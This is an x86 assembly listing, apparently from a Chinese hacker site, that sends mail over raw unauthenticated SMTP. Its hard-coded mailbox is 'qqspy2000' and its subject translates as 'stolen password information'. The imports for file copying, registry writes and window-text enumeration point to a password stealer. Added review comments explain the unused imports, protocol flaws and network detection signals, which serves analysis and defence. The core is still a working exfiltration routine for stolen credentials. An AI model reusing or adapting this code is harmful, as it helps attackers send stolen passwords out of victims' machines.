利用汇编发送无需认证的eMail


利用汇编发送无需认证的eMail

Author: whg
Email: whg@whitecell.org
Homepage: http://www.whitecell.org


include win32.inc
.586
.model flat,stdcall
.data





; ---- Hard-coded defaults passed to SendEmail by Start ----------------------
; Analyst note: server name, envelope addresses and subject are plain
; NUL-terminated strings in .data, so they are visible to a strings scan of
; any binary built from this source.
SmtpSrvr db 'smtp.elong.com',0
; Envelope sender / recipient (MAIL FROM / RCPT TO) - the same mailbox.
MailFrom0 db 'qqspy2000@elong.com',0
RcptTo0 db 'qqspy2000@elong.com',0
; Header From:/To: values; these differ from the envelope addresses above
; (capitalisation and an extra '.' before the '@').
From0 db 'QQSpy2000.@elong.com',0
To0 db 'QQSpy2000.@elong.com',0
; Subject text translates to "stolen password information".
Subject0 db '被盗密码信息',0
; Body text translates to "this is an experimental version".
Content0 db '这是实验版',0

; ---- wsprintfA templates and fixed SMTP command lines (each ends in CR LF) -
; The templates define no MIME or charset header, so the non-ASCII text is
; sent as raw bytes in whatever encoding this source file was saved in.
HelloSrvr db 'HELO %s',0dh,0ah,0
MailFrom db 'MAIL FROM: %s',0dh,0ah,0
RcptTo db 'RCPT TO: %s',0dh,0ah,0
MailData db 'DATA',0dh,0ah,0
From db 'FROM: %s',0dh,0ah,0
To db 'TO: %s',0dh,0ah,0
Subject db 'Subject: %s',0dh,0ah,0
; Body line template; the literal prefix translates to "haha".
Content db '哈哈: %s',0dh,0ah,0
; A lone '.' line terminates the DATA section.
EndMail db '.',0dh,0ah,0
QuitMail db 'QUIT',0dh,0ah,0

.code

extrn GetModuleFileNameA: proc
extrn GetSystemDirectoryA: proc
extrn CopyFileA: proc
extrn RegOpenKeyA: proc
extrn RegSetValueExA: proc
extrn RegCloseKey: proc
extrn GetModuleHandleA: proc
extrn DialogBoxParamA: proc
extrn MessageBoxA: proc
extrn ExitProcess: proc
extrn SetTimer: proc
extrn EnumWindows: proc
extrn EnumChildWindows: proc
extrn GetWindowTextA: proc
extrn SetDlgItemTextA: proc
extrn GetDlgItemTextA: proc
extrn GetClassNameA: proc
extrn SendMessageA: proc
extrn GetWindowLongA: proc
extrn ShowWindow: proc
extrn _wsprintfA: proc
extrn WSAStartup: proc
extrn socket: proc
extrn htons: proc
extrn gethostbyname: proc
extrn connect: proc
extrn send: proc
extrn recv: proc
extrn closesocket: proc
extrn WSACleanup: proc
extrn GlobalAlloc: proc
extrn GlobalFree: proc
extrn Sleep: proc
; Program entry point: sends one message built from the hard-coded defaults in
; .data (pFile is passed as NULL), then terminates the process.
; NOTE(review): of the APIs declared extrn above, this listing only calls the
; Winsock functions, _wsprintfA, GlobalAlloc/GlobalFree, Sleep, MessageBoxA
; and ExitProcess. The file-copy, registry, timer, dialog and window-text
; imports (GetModuleFileNameA, GetSystemDirectoryA, CopyFileA, RegOpenKeyA,
; RegSetValueExA, RegCloseKey, SetTimer, EnumWindows, EnumChildWindows,
; GetWindowTextA, GetClassNameA, ...) are never referenced here - presumably
; left over from a larger program. Worth recording when triaging a binary
; built from this source, since its import table is wider than its visible
; behaviour.
Start:

call SendEmail,OFF SmtpSrvr,OFF MailFrom0,OFF RcptTo0,OFF From0,OFF To0,OFF Subject0,OFF Content0,NULL
call ExitProcess,NULL

;-----------------------------------------------------------------------------
; SendEmail - send one message over a raw SMTP session on TCP port 25.
; No AUTH command is issued, so delivery depends on the server accepting
; unauthenticated submission.
;
; Args (all DWORD pointers to NUL-terminated strings):
;   pSmptSrvr  name placed in the HELO line
;   pMailFrom  envelope sender (MAIL FROM)
;   pRcptTo    envelope recipient (RCPT TO)
;   pFrom      FROM: header value
;   pTo        TO: header value
;   pSubject   Subject: header value
;   pContent   text formatted through the 'Content' template
;   pFile      not referenced anywhere in the body
;
; Working storage: one 1000h-byte zero-initialised GlobalAlloc block
;   [+0]                   saved esp
;   [+4]                   SOCKADDR for connect          (esi)
;   [+4 + size SOCKADDR]   scratch buffer: WSADATA first, then wsprintfA
;                          output and the recv buffer    (edi)
; ebx holds the socket once socket() has succeeded.
;
; NOTE(review): the host that is resolved is the global SmtpSrvr, not the
;   pSmptSrvr argument; the argument only reaches the HELO line.
; NOTE(review): nothing is read from the server until after QUIT, and no send
;   return value is checked. SMTP is a lock-step protocol, so a server that
;   rejects clients which talk before the greeting or pipeline without
;   permission (e.g. Postfix reject_unauth_pipelining) would refuse this
;   session. The same traits - a non-mail process connecting to port 25 and
;   sending commands without waiting for replies - are usable as network
;   detection signals; blocking workstation egress on TCP/25 and requiring
;   authenticated submission remove the channel altogether.
;-----------------------------------------------------------------------------
SendEmail proc pSmptSrvr: DWORD,pMailFrom: DWORD,pRcptTo: DWORD,pFrom: DWORD,pTo: DWORD,pSubject: DWORD,pContent: DWORD,pFile: DWORD
pusha                                   ; save registers; paired with popad at exit
call GlobalAlloc,GMEM_ZEROINIT,1000h
; NOTE(review): the GlobalAlloc result is not checked; a NULL return would
; fault on the store below.
mov [eax],esp                           ; remember esp; restored before GlobalFree
; presumably because _wsprintfA is cdecl and these call sites do not pop its
; arguments - confirm against how the assembler expands 'call' for extrn procs
lea esi,[eax+4]                         ; esi -> SOCKADDR
lea edi,[eax+size SOCKADDR+4]           ; edi -> scratch buffer
call WSAStartup,L 101h,edi              ; request Winsock 1.1; WSADATA lands in the scratch buffer
or eax,eax
; NOTE(review): on this failure and on the socket() failure below, ebx has not
; been assigned yet, but the error path still passes it to closesocket.
jnz SendEmailError
call socket,AF_INET,SOCK_STREAM,NULL
cmp eax,-1h                             ; -1 = socket() failed
jz SendEmailError
mov ebx,eax                             ; ebx = socket handle
mov [esi.sin_family],AF_INET
call htons,L 25                         ; SMTP port in network byte order
mov [esi.sin_port],ax
call gethostbyname,OFF SmtpSrvr         ; resolves the global, not pSmptSrvr
or eax,eax
jz SendEmailError
; win32.inc is not shown: assumes h_ip selects the hostent address field and
; that the two loads below end with the IPv4 address itself in eax, not a
; pointer to it - TODO confirm against the include file
mov eax,[eax.h_ip]
mov eax,[eax]
mov [esi.sin_addr],eax
call connect,ebx,esi,size SOCKADDR
cmp eax,-1h                             ; -1 = connect() failed
jz SendEmailError
; From here on each command is formatted into the scratch buffer and sent
; using the length returned by wsprintfA; the server greeting and replies
; are not read in between.
; HELO <pSmptSrvr>
call _wsprintfA,edi,OFF HelloSrvr,pSmptSrvr
call send,ebx,OFF edi,eax,NULL
; MAIL FROM: <pMailFrom>
call _wsprintfA,edi,OFF MailFrom,pMailFrom
call send,ebx,edi,eax,NULL
; RCPT TO: <pRcptTo>
call _wsprintfA,edi,OFF RcptTo,pRcptTo
call send,ebx,edi,eax,NULL
; DATA (fixed 6-byte command: 'DATA' + CR LF)
call send,ebx,OFF MailData,L 06h,NULL
; FROM: header
call _wsprintfA,edi,OFF From,pFrom
call send,ebx,edi,eax,NULL
; TO: header
call _wsprintfA,edi,OFF To,pTo
call send,ebx,edi,eax,NULL
; Subject: header
call _wsprintfA,edi,OFF Subject,pSubject
call send,ebx,edi,eax,NULL
; Body line. NOTE(review): no empty line is sent between the headers and
; this line, so a receiver would likely parse it as part of the header block.
call _wsprintfA,edi,OFF Content ,pContent
call send,ebx,edi,eax,NULL
; End of DATA: '.' + CR LF (3 bytes)
call send,ebx,OFF EndMail,L 03h,NULL
; QUIT + CR LF (6 bytes)
call send,ebx,OFF QuitMail,L 06h,NULL
call Sleep,1000h                        ; 1000h = 4096 ms pause before reading
call AskSrvr                            ; single recv of whatever the server sent, shown in a message box
; Common exit for success and failure: close the socket, shut Winsock down,
; restore the saved esp, then free the scratch block.
SendEmailError:
call closesocket,ebx
call WSACleanup
sub esi,04                              ; esi -> start of the scratch block
mov esp,[esi]                           ; restore the esp saved at entry
call GlobalFree,esi
popad
ret
SendEmail Endp
; MsgBox - debugging helper: shows the NUL-terminated string at edi in a
; message box, using the same pointer for both text and caption.
; In:    edi = string pointer
; Saves and restores all general registers with pushad/popad.
; Not called from anywhere in this listing.
MsgBox:
pushad
call MessageBoxA,NULL,edi,edi,NULL
popad
ret
; AskSrvr - read up to 100h bytes from the socket in ebx into the buffer at
; edi and display that buffer in a message box (text and caption).
; In:    ebx = connected socket, edi = scratch buffer
; Saves and restores all general registers with pushad/popad.
; NOTE(review): the recv return value is ignored, so errors and a closed
; connection are not distinguished, and the received bytes are not explicitly
; NUL-terminated. The buffer was zero-initialised at allocation but has since
; been written by WSAStartup and wsprintfA, so older bytes may follow the
; reply in the displayed text.
AskSrvr:
pushad
call recv,ebx,edi,L 100h,NULL
call MessageBoxA,NULL,edi,edi,NULL
popad
ret
End Start